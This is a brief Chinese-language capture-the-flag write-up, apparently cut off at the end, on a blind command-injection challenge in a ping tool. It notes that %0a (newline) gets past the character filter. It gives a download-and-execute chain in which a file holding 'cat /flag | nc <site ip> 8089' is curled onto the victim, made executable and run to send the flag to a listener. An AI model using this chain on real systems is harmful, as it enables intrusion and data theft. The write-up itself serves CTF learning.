死亡ping命令

参考：https://blog.csdn.net/m0_50317371/article/details/110489711

这个题有两个问题：

第一个就是没有回显，输入能够ping的ip无回显；输入特殊字符，提示含有危险字符；不输入，提示为空；这就导致即使执行成功的命令，比如:cat /flag，也不能看到flag

第二个问题就是过滤了很多字符，这个可用特殊字符字典抓包爆破，能够快速查找到没过滤的字符，%0a（换行符）

 

第一个问题方法：

1. 需要一个可远程访问的网站，在网站上放一个文件，内容为 ls | cat /flag |nc 网站ip 8089;  ls的查询内容为cat 的输入内容
2. 在受害机上curl 这个文件到指定目录
3. 增加文件权限,chmod
4. 在网站的ip下设置监听
5. 执行文件，sh file，受害机在执行文件后就会连接到网站ip

这样，cat的内容才能在网站主机上显示出来

 

因为我不是在本机上搭的这题的环境，我也没有